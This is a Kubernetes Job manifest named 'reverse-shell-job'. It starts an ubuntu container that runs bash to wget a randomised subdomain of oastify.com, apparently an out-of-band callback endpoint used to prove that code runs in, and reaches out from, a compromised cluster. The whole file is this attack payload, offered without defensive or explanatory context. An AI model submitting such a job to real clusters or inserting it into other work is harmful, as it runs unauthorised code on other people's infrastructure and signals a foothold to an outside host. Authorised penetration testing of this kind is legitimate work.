apiVersion: batch/v1
kind: Job
metadata:
  name: reverse-shell-job
  namespace: default
spec:
  template:
    spec:
      containers:
        - name: reverse-shell
          image: ubuntu:latest
          command: ["/bin/bash", "-c", "wget w0xxbvoy5ypvm5czv3s6gvkpogu7iykm9.oastify.com"]
      restartPolicy: Never
  backoffLimit: 0
